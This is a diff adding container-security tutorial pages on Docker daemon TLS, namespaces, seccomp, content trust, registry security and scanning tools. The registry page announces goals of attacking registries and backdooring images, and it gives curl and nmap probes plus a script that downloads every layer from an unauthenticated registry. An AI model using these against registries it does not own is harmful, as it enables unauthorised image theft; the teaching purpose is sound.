It is generally used to register the CN in the certificate: + +Create certificate Directory: + +```bash +$ mkdir -p /etc/docker/dockerd/CA && cd /etc/docker/dockerd/CA +``` + + +Generate the key certificate and fill in the key certificate password twice: +```bash +$ openssl genrsa -aes256 -out ca-key.pem 4096 +``` +To generate a CA certificate, you need to enter the basic information of the registration certificate: +```bash +$ openssl req -new -x509 -days 365 -key ca-key.pem -sha256 -out ca.pem +``` +Create server certificate: + +```bash +$ openssl genrsa -out server-key.pem 4096 + +$ openssl req -subj "/CN=localhsot" -sha256 -new -key server-key.pem -out server.csr +``` + +Set the IP address specified by the certificate: + + +```bash +$ echo subjectAltName = DNS:localhost,IP:127.0.0.1 >> extfile.cnf +``` +Set the extended usage property of the docker daemon key to server authentication only: +```bash +$ echo extendedKeyUsage = serverAuth >> extfile.cnf +``` +Generate server cert certificate: +```bash +$ openssl x509 -req -days 3650 -sha256 -in server.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out server-cert.pem -extfile extfile.cnf +``` +Client certificate + +Create client certificate: (or current directory) +```bash +$ openssl genrsa -out key.pem 4096 +$ openssl req -subj '/CN=localhost' -new -key key.pem -out client.csr + +``` +To make the key suitable for client authentication, create an extended profile: + + +```bash +$ echo extendedKeyUsage = clientAuth >> extfile.cnf +``` + +Generate client cert certificate: + +```bash +$ openssl x509 -req -days 3650 -sha256 -in client.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out cert.pem -extfile extfile.cnf + +``` + +use + +Give corresponding permissions to the certificate: + +```bash +$ chmod -v 0400 ca-key.pem key.pem server-key.pem +$ chmod -v 0444 ca.pem server-cert.pem cert.pem + +[root@localhost CA]# ls +ca-key.pem ca.pem ca.srl cert.pem client.csr extfile.cnf key.pem server-cert.pem server.csr server-key.pem + +``` +Server configuration /etc/docker/daemon.json + +```json + +"tls": true, +"tlsverify": true, +"tlscacert": "/etc/docker/CA/ca.pem", +"tlscert": "/etc/docker/CA/server-cert.pem", +"tlskey": "/etc/docker/CA/server-key.pem" +``` + +Client configuration + +Set the client certificate on the server and place it in the corresponding location: + +```bash +$ cp -v {ca,cert,key}.pem ~/.docker +$ export DOCKER_HOST=tcp://$HOST:2376 DOCKER_TLS_VERIFY=1 + +``` + +Simulate the test as follows: + +```json +$ curl https://$HOST:2376/images/json + --cert ~/.docker/cert.pem + --key ~/.docker/key.pem + --cacert ~/.docker/ca.pem + +[{"Containers":-1,"Created":1540777343,"Id":"sha256:55e7b305dc477345434ce3bd3941940481f982eea31c8f28c0670d59c63d544b","Labels":nu +``` + +# using namespace isolation technology + +Namespace is an isolation technology. Docker uses the isolation technology to open a specific namespace and create some special processes, but the use of namespace is conditional. The system will create a dockremap and map it to the container through the ID values corresponding to / etc / subuid and / etc / subuid; The actual situation still uses the ordinary permission of dockremap to achieve the effect of automatic isolation. + + + +Modify first/etc/sysctl.conf +```conf +# echo β€œuser.max_user_namespaces=15076” >> /etc/sysctl.conf +``` +stay /etc/docker/daemon.json Add the configuration item β€œuserns remap”: β€œdefault” + +Be careful when modifying this configuration. 
If you have deployed a set of docker environment, after enabling this option, you will switch to the isolated environment, and the previous docker container will not be used! + + +``` + +[root@localhost docker]# cat /etc/subuid +dockremap:100000:65536 + +``` + +# setting the partition of docker + +Create a separate partition for the container. The default partition isvarlibdocker, including local images, containers, networks and other related things. + +```bash + +root@localhost docker]# ls /var/lib/docker +``` + +100000.100000 builder buildkit containers image network overlay2 plugins runtimes swarm tmp trust volumes + +You can use β€œdata root”: β€œto configure the default partition location. + +# limit traffic between default bridge containers + +When the docker service is started, a forwarding policy will be added to the forward chain of iptables by default. Whether the policy is accept or drop depends on whether β€” ICC = true (default) or β€” ICC = false is configured. If β€” iptables = false is manually specified, iptables rules will not be added. + + +By default, all network communication is allowed between containers on the same host on the default bridge. If not required, the communication between all containers is limited. Link specific containers that need to communicate together, or create a custom network and join only containers that need to communicate with the custom network. + + +Configure to limit the traffic β€œICC” between containers on the default bridge: false + +# configuration log + +Configure the centralized remote log, set the log process β€” log level level to info, log record format JSON, local log record + +```json + +"log-level": "info", +"log-driver": "json-file", +"log-opts": { + "max-size": "10m", + "max-file":"5", + "labels": "somelabel", + "env": "os,customer" +}, + +``` + +![Alt text](./images/config-remote.jpg) + + +The docker logging driver receives the container log and forwards it to a remote destination or file. The default logging driver isjson-file。 It stores container logs on local disk in JSON format. Docker has a plug-in architecture for logging, so there are plug-ins for open source tools and commercial tools: + + +Journaled – stores the container log in the system log + +Syslog driver – supports UDP, TCP, TLS + +Fluent D – supports connecting TCP or UNIX sockets to fluent D + +Splunk – http / HTTPS forwarding to Splunk server + +Gel – UDP logs forwarded to graylog2 + +Example fluent + + +``` +{ + "log-driver": "fluentd", + "log-opts": { + "fluentd-address": "fluentdhost:24224" + } + } + +``` + +Using syslog + +``` +{ + "log-driver": "syslog", + "log-opts": { + "syslog-address": "udp://1.2.3.4:1111" + } +} +``` + +# setting ulimit + + +``` +{ + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 64000, + "Soft": 64000 + } + } +} +``` + +# setting CGroup + +The cggroup parent option allows you to set the default cggroup parent for the container. If this option is not set, the default value for FS CGroup driver is / docker; For SYSTEMd CGroup driver, the default is system slice 。 + +If CGroup has a forward slash (/), CGroup is created under the root CGroup, otherwise CGroup is created under the daemon CGroup. + + +Assuming that the daemon runs in CGroup daemon CGroup, then β€” CGroup parent = / foobar creates a CGroup in / sys / FS / CGroup / memory / foobar, while β€” CGroup parent = foobar creates a CGroup/sys/fs/cgroup/memory/daemoncgroup/foobar Create CGroup in. + +SYSTEMd CGroup driver has different rules for – CGroup parent. 
System D represents the hierarchy by slice, and the name of the slice encodes the position in the tree. Therefore, the β€” CGroup parent of SYSTEMd CGroup should be the slice name. Names can contain a series of names separated by dashes that describe the path from the root slice to the slice. For example, β€” CGroup parent = user-a-b.slice indicates that the memory of the container is CGroup /sys/fs/cgroup/memory/user.slice/user-a.slice/user-a-b.slice/docker-.scope Created in. + +You can also use container run to set it. Using the β€” CGroup parent option on docker create and docker run will take precedence over the β€” CGroup parent option on the daemon. + + +# configuring seccomp + +For the test configuration file used, it is forbidden to use the Chmod command in docker + +``` +https://github.com/docker/labs/blob/master/security/seccomp/seccomp-profiles/default-no-chmod.json +[root@localhost docker]# docker run --rm -it alpine sh +/ # ls bin etc lib mnt proc run srv tmp var +dev home media opt root sbin sys usr / # touch foo.sh +/ # chmod +x foo.sh +chmod: foo.sh: Operation not permitted +/ # exit + + + + +``` +It can actually complete some system related calls of prohibition, permission and alarm. Refer to:https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl + +# disable the experimental function of docker + +Set β€œexperimental”: false + +2.11 restrict containers from raising rights through suid or sgid + +The no new privileges security option prevents application processes within the container from gaining new privileges during execution. + +For example: there is a program with setuid / setgid bit set in the image, such as sudo. The process in the container also has (file) permission to execute the program. Any operation attempting to obtain privileges through facilities such as setuid / setgid will be rejected. + +# Daemon configuration example description (Linux) + + +```bash +{ + "authorization-plugins": [],//access authorization plugin + "data-root": "", //the root directory of docker data persistent storage, the default is /var/lib/docker + "dns": [], //DNS server + "dns-opts": [],//DNS configuration options, such as ports, etc. + "dns-search": [],//DNS search domain name + "exec-opts": [], //execution options + "exec-root": "",//The root directory of the file in the execution state + "experimental": false,//whether to enable experimental features + "features": {},//Enable or disable specific features. Such as: {"buildkit": true} makes buildkit the default docker image builder. 
+ "storage-driver": "",//Storage driver type + "storage-opts": [],//storage options + "labels": [],//key-value pair label docker metadata + "live-restore": true, //whether to keep the container alive when dockerd hangs up (to avoid the container exit caused by the docker service exception) + "log-driver": "json-file",//The driver of the container log + "log-opts": { + "max-size": "10m", + "max-file": "5", + "labels": "somelabel", + "env": "os,customer" + },//Options for container logs + "mtu": 0,//Set container network MTU (Maximum Transmission Unit) + "pidfile": "",//The location of the daemon PID file + "cluster-store": "",//URL of the cluster storage system + "cluster-store-opts": {},//Configure cluster storage + "cluster-advertise": "",//External address name + "max-concurrent-downloads": 3,//Set the maximum concurrency of each pull process + "max-concurrent-uploads": 5,//Set the maximum concurrency of each push process + "default-shm-size": "64M",//Set the default shared memory size + "shutdown-timeout": 15,//Set the shutdown timeout period + "debug": true,//Enable debug mode + "hosts": [],//The listening address of the dockerd daemon process + "log-level": "",//log level + "tls": true, //Enable the Transport Layer Security Protocol TLS + "tlsverify": true, //Enable the transport layer security protocol and verify the remote address + "tlscacert": "",//CA signature file path + "tlscert": "",//TLS certificate file path + "tlskey": "",//TLS key file path + "swarm-default-advertise-addr": "", //swarm external address + "api-cors-header": "",//Set CORS (Cross-origin resource sharing) header + "selinux-enabled": false,//Enable selinux (mandatory access control for users, processes, applications, files) + "userns-remap": "",//Set user/group for user namespace + "group": "", //Docker is in the group + "cgroup-parent": "",//Set the parent class of cgroup of all containers + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 64000, + "Soft": 64000 + } + },//Set the ulimit of all containers + "init": false,//The container performs initialization to forward signals or control (reap) processes + "init-path": "/usr/libexec/docker-init", //docker-init file path + "ipv6": false,//support IPV6 network + "iptables": false,//Enable firewall rules + "ip-forward": false, //Open net.ipv4.ip_forward + "ip-masq": false,//Enable ip masking (the technology of rewriting the source IP address or destination IP address when the IP packet passes through a router or firewall) + "userland-proxy": false, //userland proxy + "userland-proxy-path": "/usr/libexec/docker-proxy", //userland proxy path + "ip": "0.0.0.0",//Default IP + "bridge": "",//Attach the container to the bridge identifier on the bridge network + "bip": "",//Specify bridge IP + "fixed-cidr": "",//(ipv4) subnetting, that is, limiting the range of ip address allocation to control the network segment to which the container belongs to achieve network access between containers (the same host or between different hosts) + "fixed-cidr-v6": "", //(ipv6) subnetting + "default-gateway": "",//default gateway + "default-gateway-v6": "",//default ipv6 gateway + "icc": false,//Inter-container communication + "raw-logs": false, //raw logs (no color, full timestamp) + "allow-nondistributable-artifacts": [],//Registry warehouse submitted by products that are not distributed externally + "registry-mirrors": [],//registry warehouse mirror acceleration address + "seccomp-profile": "", //seccomp configuration file + "insecure-registries": [],//Configure 
non-https registry address + "no-new-privileges": false, //Disable new privileges + "default-runtime": "runc", //OCI alliance (The Open Container Initiative) default runtime environment + "oom-score-adjust": -500,//Priority of memory overflow being killed (-1000~1000) + "node-generic-resources": ["NVIDIA-GPU=UUID1", "NVIDIA-GPU=UUID2"],//Resource nodes announced to the public + "runtimes": { + "cc-runtime": { + "path": "/usr/bin/cc-runtime" + }, + "custom": { + "path": "/usr/local/bin/my-runc-replacement", + "runtimeArgs": [ + "--debug" + ] + } + },//Runtime + "default-address-pools": [ + {"base":"172.80.0.0/16","size":24}, //Default dhcp assigned address + {"base":"172.90.0.0/16","size":24} + ] +} + +``` diff --git a/content/en/containersecurity/b22.DCT 2.md b/content/en/containersecurity/b22.DCT 2.md new file mode 100644 index 0000000..2e476f1 --- /dev/null +++ b/content/en/containersecurity/b22.DCT 2.md @@ -0,0 +1,53 @@ +--- +title: "Content Trust and Integrity checks" +slug: "Content-Trust-and-Integrity-checks" +--- + + +Content Trust and Integrity checks + +Docker Content Trust (DCT) makes it simple and easy to verify the integrity and the publisher of images that you download and run. This is especially important when pulling images over untrusted networks such as the internet. + + +```bash +docker trust key generate sangam +Generating key for sangam... +Enter passphrase for new nigel key with ID 1f78609: +Repeat passphrase for new nigel key with ID 1f78609: +Successfully generated and loaded private key.... public key available: /root/sangam.pub + + +``` + +```bash +$ docker trust signer add --key sangam.pub sangam sangam14/dct +Adding signer "nigel" to sangam14/dct... +Initializing signed repository for sangam/dct... +Enter passphrase for root key with ID aee3314: +Enter passphrase for new repository key with ID 1a18dd1: +Repeat passphrase for new repository key with ID 1a18dd1: +Successfully initialized "sangam14/dct" +Successfully added signer: nigel to sangam14/dct +``` + +```bash +docker trust sign sangam14/dct:signed + +docker trust inspect sangam14/dct:signed --pretty +``` + +# Enabling DCT + + +```bash +$ export DOCKER_CONTENT_TRUST=1 + +``` + +# verify the image + + +```bash +docker image pull sangam14/dct:unsigned +No valid trust data for unsigned +``` \ No newline at end of file diff --git a/content/en/containersecurity/b23.docker-registry 2.md b/content/en/containersecurity/b23.docker-registry 2.md new file mode 100644 index 0000000..07da913 --- /dev/null +++ b/content/en/containersecurity/b23.docker-registry 2.md @@ -0,0 +1,188 @@ +--- +title: "Docker Registry security configurations " +slug: "Docker-Registry-security-configurations" +--- + +What will you learn? 
+ +- InteractIing with insecure registry with curl +- +Fetching images using curl and analyzing image layers +Attacking protected Docker registry +Backdooring images and leveraging auto-deployment mechanisms to attack Docker host + + +# Intracting with Insecure Registry + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker run -d \ + -p 5000:5000 \ + --name registry \ + -v /registry/data:/var/lib/registry \ + --restart always \ + registry:2 +Unable to find image 'registry:2' locally +2: Pulling from library/registry +ca7dd9ec2225: Pull complete +c41ae7ad2b39: Pull complete +1ed0fc8a6161: Pull complete +21df229223d2: Pull complete +626897ccab21: Pull complete +Digest: sha256:ce14a6258f37702ff3cd92232a6f5b81ace542d9f1631966999e9f7c1ee6ddba +Status: Downloaded newer image for registry:2 +729cabb707e247e548ff84aa096c03e922e39e78bbe3c65753478305575576a6 + + +``` + +check + +``` bash +[node1] (local) root@192.168.0.18 ~ +$ docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +729cabb707e2 registry:2 "/entrypoint.sh /etc…" 11 seconds ago Up 10 seconds 0.0.0.0:5000->5000/tcp registry + +``` + +pull image from docker hub and push to local registry + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker pull alpine:3.6 +3.6: Pulling from library/alpine +5a3ea8efae5d: Pull complete +Digest: sha256:66790a2b79e1ea3e1dabac43990c54aca5d1ddf268d9a5a0285e4167c8b24475 +Status: Downloaded newer image for alpine:3.6 +docker.io/library/alpine:3.6 +``` +push to local registry + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker tag alpine:3.6 localhost:5000/alpine:3.6 +[node1] (local) root@192.168.0.18 ~ +$ docker push localhost:5000/alpine:3.6 +The push refers to repository [localhost:5000/alpine] +721384ec99e5: Pushed +3.6: digest: sha256:36c3a913e62f77a82582eb7ce30d255f805c3d1e11d58e1f805e14d33c2bc5a5 size: 528 + +``` +remove image from local docker host + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker image remove localhost:5000/alpine:3.6 +Untagged: localhost:5000/alpine:3.6 +Untagged: localhost:5000/alpine@sha256:36c3a913e62f77a82582eb7ce30d255f805c3d1e11d58e1f805e14d33c2bc5a5 +``` +pull new image from local registry + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker pull localhost:5000/alpine:3.6 +3.6: Pulling from alpine +Digest: sha256:36c3a913e62f77a82582eb7ce30d255f805c3d1e11d58e1f805e14d33c2bc5a5 +Status: Downloaded newer image for localhost:5000/alpine:3.6 +localhost:5000/alpine:3.6 +[node1] (local) root@192.168.0.18 ~ +``` + +```bash +curl -s http://localhost:5000/v2/_catalog +{"repositories":["alpine"]} +ubuntu $ nmap -p 5000 localhost +Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-07 23:45 UTC +Nmap scan report for localhost (127.0.0.1) +Host is up (0.000064s latency). + +PORT STATE SERVICE +5000/tcp open upnp + +Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds +``` + +# Fetching images using curl and analyzing image layers + +```bash +ubuntu $ curl -s http://localhost:5000/v2/alpine/tags/list +{"name":"alpine","tags":["3.6"]} + +``` +/_catalog endpoint returns a list of repositories available in the registry. 
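
The manifest request below returns the legacy schema 1 document that the registry serves by default. As a side note (this is standard Registry v2 API behaviour rather than anything specific to this lab setup), sending an `Accept` header for the schema 2 media type also returns the content digest, which is what you need for digest-addressed pulls or deletes:

```bash
# Request the schema 2 manifest headers and read the content digest
curl -sI \
  -H "Accept: application/vnd.docker.distribution.manifest.v2+json" \
  http://localhost:5000/v2/alpine/manifests/3.6 | grep -i docker-content-digest

# The digest can then be used in place of the tag, for example:
# GET /v2/alpine/manifests/sha256:<digest>   (placeholder digest)
```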
+ +```bash +ubuntu $ curl -s http://localhost:5000/v2/alpine/manifests/3.6 + + + + +```bash + +{ + "schemaVersion": 1, + "name": "alpine", + "tag": "3.6", + "architecture": "amd64", + "fsLayers": [ + { + "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:5a3ea8efae5d0abb93d2a04be0a4870087042b8ecab8001f613cdc2a9440616a" + } + ], + "history": [ + { + "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:143f9315f5a85306192ccffd37fbfa65db21f67aaa938c2538bd50f52123a12f\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container\":\"fd086f4b9352674c6a1ae4d02051f95a4e0a55cda943c5780483938dedfb2d8f\",\"container_config\":{\"Hostname\":\"fd086f4b9352\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) \",\"CMD [\\\"/bin/sh\\\"]\"],\"ArgsEscaped\":true,\"Image\":\"sha256:143f9315f5a85306192ccffd37fbfa65db21f67aaa938c2538bd50f52123a12f\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-03-07T22:20:00.563496859Z\",\"docker_version\":\"18.06.1-ce\",\"id\":\"baaf9c1caf4fb211f173d053029997dcfade0644ac354c8a068e4ebf23fcf1c5\",\"os\":\"linux\",\"parent\":\"5d8f720b0ab2b92a29a7e338aa90cad32dac2bf6518c7aae5844aab896ee36ec\",\"throwaway\":true}" + }, + { + "v1Compatibility": "{\"id\":\"5d8f720b0ab2b92a29a7e338aa90cad32dac2bf6518c7aae5844aab896ee36ec\",\"created\":\"2019-03-07T22:20:00.434038891Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:9714761bb81de664e431dec41f12db20f0438047615df2ecd9fdc88933d6c20f in / \"]}}" + } + ], + "signatures": [ + { + "header": { + "jwk": { + "crv": "P-256", + "kid": "AHL3:52R5:PMFF:XHCJ:VYKX:OOEL:IUGD:JPPY:CLW4:HBE3:PSWY:CT6H", + "kty": "EC", + "x": "nsfDpo11GTUjCyx98IT4s4VJqns97kipPMB_nU-3JCs", + "y": "eaFL1-YY16GBI31WV-FgjRp6C-koWvsUqjJRFknMjDM" + }, + "alg": "ES256" + }, + "signature": "48-BseaiWn17IyGHwsEGnxCUxnkAyI8fmMIFP3Ry2mDF5o23dQiDMPcbH62ik2mNAxmWA5-yKrBtjTuIn5FXAw", + "protected": "eyJmb3JtYXRMZW5ndGgiOjIxMzAsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMy0wMS0wOFQwMDowMTozMFoifQ" + } + ] +} + +``` + + +```bash + +#!/bin/bash + +# Download all the fsLayers from the remote registry using curl command +# Usage: ./download.bash http://registry:5000 image [tag] + +URL="$1" +IMAGE="$2" +TAG="${3:-latest}" + +BLOBS=( $(curl "$URL/v2/$IMAGE/manifests/$TAG" -s | python -m json.tool | grep blobSum | cut -d '"' -f 4) ) + +for ((idx = 0 ; idx < ${#BLOBS[@]}; idx++)); do + BLOB=${BLOBS[$idx]} + SUMIDX=$(($idx + 1)) + DIR="$PWD/$IMAGE/$SUMIDX" + rm -rf "$DIR" ; mkdir -p "$DIR/fs" + + curl -s "$URL/v2/$IMAGE/blobs/$BLOB" -o "$DIR/layer.tar" + tar xf "$DIR/layer.tar" -C "$DIR/fs" +done +``` + diff --git a/content/en/containersecurity/b24.dockerscan 2.md b/content/en/containersecurity/b24.dockerscan 2.md new file mode 100644 index 0000000..c036727 --- /dev/null +++ b/content/en/containersecurity/b24.dockerscan 2.md @@ -0,0 +1,58 @@ +--- +title: "DockerScan" +slug: 
"dockerscan" +--- + +# DockerScan + + +Docker Scan Support actions for docker registory scanning , image analysis and image meta information exaction to look for password , URL/ IP etc in the envirmonment variavle and any kind of sudo call by user + + +1. create a directory for this + +``` +$ sudo mkdir dockersec-2 +$ cd dockersec-2 + +``` +check pyhon version which mustt be greater then 3.5 and must have pip installed + +``` +$ python3 --version +``` +``` +$ sudo apt install python3-pip +$ which pip3 +`` + +Install Dockerscan with pip3 + +``` +$ sudo /user/bin/pip3 install dockerscan + +``` + +pull the ngnix docker image from dockerhub + +``` +$ sudo docker pull ngnix +``` + + save the docker image using docker save + +``` +$ sudo docker save ngnix -o ng-orig +$ ls +``` + +scan the image + +``` + +sudo dockerscan image info ng-orig + +``` + +as we can see the information reveals the CMD runs , ENV variable , exposed ports etc + \ No newline at end of file diff --git a/content/en/containersecurity/b25.Dive 2.md b/content/en/containersecurity/b25.Dive 2.md new file mode 100644 index 0000000..5396f3a --- /dev/null +++ b/content/en/containersecurity/b25.Dive 2.md @@ -0,0 +1,74 @@ +--- +title: " Dive " +slug: "dive" +--- + +# Dive + + +* Ubuntu /Debian + +```bash +wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb sudo apt install ./dive_0.9.2_linux_amd64.deb +``` + +* RHEL/CemtOS + +```bash +curl -OL https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.rpm rpm -i dive_0.9.2_linux_amd64.rpm + +``` + +* Arch Linux + +```bash +ay -S dive + +``` + +Mac OS X + +```bash +brew install dive + +``` + +# How to use Dive + +To analyze a Docker image simply run dive with an image tag/id/digest: + +```bash + +$ dive +``` + +or if you want to build your image then jump straight into analyzing it: + +```bash +$ dive build -t +``` + +example ngnix image + +![](./images/dive.png) + + +another tool that make this all more easy + +https://github.com/prakhar1989/dive-in + +![](./images/1.png) + +![](./images/2.png) + + +# recommanded tool slim.ai + + +Remove friction by securing your software supply chain with optimized containers specific to your application needs, while automatically reducing vulnerabilities in the process. + + +https://slim.ai/ + +portal.slim.ai + diff --git a/content/en/containersecurity/b26.docker-events 2.md b/content/en/containersecurity/b26.docker-events 2.md new file mode 100644 index 0000000..0231c88 --- /dev/null +++ b/content/en/containersecurity/b26.docker-events 2.md @@ -0,0 +1,224 @@ +--- +title: "Docker events" +slug: "docker-events" +--- + +# Docker events + +Docker events describe the activities taken by your Docker daemon. Most interactions with objects such as containers, images, volumes, and networks record an event, creating a log that you can use to inspect past changes. 
+ +There are many different kinds of event that identify specific changes in your environment: + +- Creating and removing containers +- Container health check statuses +- Commands executed inside containers with docker exec +- Pulling and pushing images +- Creating, destroying, mounting, and unmounting volumes +- Enabling and disabling Docker daemon plugins + +``` +$ docker run --rm hello-world + +``` + + +Several events should now appear in the terminal window that’s running the docker events command: + +``` +$ docker events +2022-05-31T15:20:00.267970018+01:00 image pull hello-world:latest (name=hello-world) +2022-05-31T15:20:00.347054862+01:00 container create 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 (image=hello-world, name=nifty_morse) +2022-05-31T15:20:00.347805277+01:00 container attach 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 (image=hello-world, name=nifty_morse) +2022-05-31T15:20:00.621070053+01:00 container start 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 (image=hello-world, name=nifty_morse) + +``` + +Each event displays on its own line. The event timestamp is displayed first, followed by the type of object affected (such as image or container) and then the action that was taken (like create, attach, and start). The remainder of the message contains useful metadata about the object. The example above reveals that the hello-world:latest image was pulled and a container created from it. + +Formatting Output + +The raw event list is often unwieldy. You can reformat the output using the --format flag which accepts a Go template string: + + +``` +$ docker events --format '{{ .Time }} {{ .Action }} {{ .Type}} {{ .ID }}' + +``` + + +Running this example will produce output that looks like this: + + +``` +1654006800 pull image hello-world:latest +1654006800 create container 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 +1654006800 attach container 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 +1654006800 start container 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 + +``` + +You can get events represented as JSON objects by using {{ json . }} as your template string: + +``` +$ docker events --format '{{ json . }}' | jq +{ + "status": "create", + "id": "4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378", + "from": "hello-world", + "Type": "container", + "Action": "create", + "Actor": { + "ID": "4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378", + "Attributes": { + "image": "hello-world", + "name": "nifty_morse" + } + }, + "scope": "local", + "time": 1654006800, + "timeNano": 1654006800347054800 +} + + +``` + +## Filtering Events + +``` + +docker events --filter type=container //Get all events that relate to containers. +docker events --filter event=create // Get container creation events. +docker events --filter container=demo-container –// Get all the events saved for the container called demo-container (you can reference the container’s ID or name). + +``` +Besides container, you can filter by all supported object type names such as image, network, and volume. + +Multiple filters are supported when you repeat the --filter flag. Distinct filters are interpreted as logical AND conditions; multiple uses of the same filter become OR clauses. 
Here's an example which surfaces the create event for both the app-container and api-container containers: + +``` +$ docker events \ + --filter container=app-container \ + --filter container=api-container \ + --filter event=create + +``` + +## Accessing Historical Events + +docker events defaults to only showing events emitted after the command starts running. You can include historical events by adding the --since flag. This accepts a human-readable time expression or an absolute timestamp: + +``` + +$ docker events --since 1h +$ docker events --since '2022-06-01T16:00:00' +``` + +Events recorded after the given time will immediately be shown in your terminal. New events will continue to show up in real-time as they're recorded. + +You can exclude events after a particular time with the --until flag. It works similarly to --since. Using --until will disable real-time streaming of new events because they'd fall outside the requested timeframe. + +## Streaming Docker Events From the Daemon REST API + +Another way to access stored events is through the Docker daemon REST API. You can use the /events endpoint to stream events in real-time after you've enabled the API on your Docker host. Events will be returned in JSON format: + +``` +$ curl http://127.0.0.1:2375/v1.41/events +{ + "Type": "container", + "Action": "create", + "Actor": { + "ID": "4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378", + "Attributes": { + "image": "hello-world", + "name": "nifty_morse" + } + }, + "scope": "local", + "time": 1654006800, + "timeNano": 1654006800347054800 +} +``` + +The API endpoint supports filters, since, and until parameters that have the same behaviors as their CLI counterparts. The filters value is a JSON map of filter names to lists of values, and the query string must be URL-encoded (curl's -G and --data-urlencode options take care of this). Here's how to retrieve all container creation events recorded in the past hour: + +``` + +$ curl -G http://127.0.0.1:2375/v1.41/events --data-urlencode 'since=1h' --data-urlencode 'filters={"type":["container"],"event":["create"]}' + + +``` + +## Sending Events to an External Service + +Docker lacks a built-in way to send events to an external service. This could be useful if you want all your container creations to be logged in an existing monitoring or auditing platform. + +You can set up your own solution by creating a system service that continually runs docker events. It should send each new line of output to your external system.
First write a Bash script that implements the functionality you need, save it as /usr/local/bin/docker-events.sh (the path referenced by the service unit below), and make it executable: + +``` +#!/bin/bash +# Forward each docker event line to an external endpoint as JSON. +docker events --format '{{ .Time }} {{ .Action }} {{ .Type }} {{ .ID }}' | while read -r event +do + curl \ + -X POST \ + -H "Content-Type: application/json" \ + -d "{\"event\": \"$event\"}" \ + https://example.com/events +done + +``` + +Now create a new systemd service unit at `/etc/systemd/system/docker-events.service`: + +``` +[Unit] +Description=Custom Docker Event Monitoring Service +After=docker.service + +[Service] +Type=simple +ExecStart=/usr/local/bin/docker-events.sh + +[Install] +WantedBy=multi-user.target + +``` + +Finally reload systemd to load your service, then start and enable the unit: + +``` +$ sudo systemctl daemon-reload +$ sudo systemctl start docker-events +$ sudo systemctl enable docker-events + +``` + + +## Docker events commands example + +Listening for Docker events + +``` +$ docker events +``` +Listening for events since a given date +``` +$ docker events --since '2015-01-28' +$ docker events --since '3m' +``` +Listening for Docker events based on filter +``` +$ docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' +$ docker events --filter 'event=stop' +$ docker events --filter 'image=ubuntu-1:14.04' +$ docker events --filter 'container=7805c1d35632' +$ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' +$ docker events --filter 'container=7805c1d35632' --filter 'event=stop' +$ docker events --filter 'type=volume' +$ docker events --filter 'type=network' +$ docker events --filter 'type=plugin' (experimental) +``` +Listening for Docker events based on format +``` +$ docker events --format '{{json .}}' +``` \ No newline at end of file diff --git a/content/en/containersecurity/b27.ThreatMapper-app 2.md b/content/en/containersecurity/b27.ThreatMapper-app 2.md new file mode 100644 index 0000000..a870a4a --- /dev/null +++ b/content/en/containersecurity/b27.ThreatMapper-app 2.md @@ -0,0 +1,611 @@ +--- +title: "Scanning Docker for vulnerabilities with ThreatMapper" +slug: "Scanning-Docker-for-vulnerabilities-with-ThreatMapper" +--- + +Originally published on [CloudNativeFolks]() + +`ThreatMapper` + +ThreatMapper hunts for threats in your production platforms, and ranks these threats based on their risk-of-exploit. It uncovers vulnerable software components, exposed secrets and deviations from good security practice. ThreatMapper uses a combination of agent-based inspection and agent-less monitoring to provide the widest possible coverage to detect threats. + +[![Readme Card](https://github-readme-stats.vercel.app/api/pin/?username=deepfence&repo=Threatmapper)](https://github.com/deepfence/Threatmapper) + 